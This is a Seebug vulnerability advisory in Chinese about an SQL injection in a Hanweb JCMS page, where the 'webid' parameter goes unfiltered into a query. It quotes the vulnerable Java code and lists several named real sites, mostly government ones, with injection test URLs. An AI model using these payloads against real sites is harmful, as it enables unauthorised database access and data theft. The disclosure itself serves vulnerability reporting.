大汉网络某系统SQL注入漏洞

2015-01-15T00:00:00
ID SSV:93903
Type seebug
Reporter Root
Modified 2015-01-15T00:00:00

Description

简要描述:

SQL注入,遍历全部系统数据库。JCMS JIS 等。

详细说明:

SQL注入: /vc/vc/interface/index/que_style_coltop.jsp 代码分析:

String strWebId = Convert.getParameter(request, "webid").trim();//webid没有过滤 String strColumnId = Convert.getParameter(request, "colid").trim(); String strWebSiteUrl = ""; .... .... //获取栏目排行数据 if (strMsg == null) { WebInfoBLF webBlf = new WebInfoBLF(); strWebSiteUrl = "http://"+webBlf.getWebUrl(strWebId); strSql = "SELECT a.columnid,b.vc_url,a.monthtotal,b.vc_cataname" + " FROM jcms_visitcountcolumnday a,jcms_cataloginfo b " + " WHERE a.i_webid="+ strWebId //直接带入SQL执行。

能够操纵全部数据库JCMS JIS等信息,进行篡改,提权,脱裤等。 案例: 山东农业 http://www.sdny.gov.cn/vc/vc/interface/top/que_style_coltop.jsp?webid=1+and+1=1 安徽工商 http://www.ahaic.gov.cn/vc/vc/interface/index/que_style_coltop.jsp?webid=1+and+1=1 武冈 http://www.wugang.gov.cn/vc/vc/interface/index/que_style_coltop.jsp?webid=1+and+1=1 贵阳 http://cq.kuku999.com/vc/vc/interface/index/que_style_coltop.jsp?webid=1+and+1=1 中国建筑 http://www.xjjgjt.com/vc/vc/interface/index/que_style_coltop.jsp?webid=1+and+1=1

漏洞证明:

验证漏洞URL:(这个好像已经修补了,截图不变,使用案例中的站点) http://www.simt.com.cn/vc/vc/interface/index/que_style_coltop.jsp?webid=1 漏洞截图:

<img src="https://images.seebug.org/upload/201410/12113900ebc731866177ae91d54d592734253830.png" alt="clipboard.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201410/1211394106537f00bbb7bef5c16ed29cef22fda1.png" alt="clipboard.png" width="600" onerror="javascript:errimg(this);">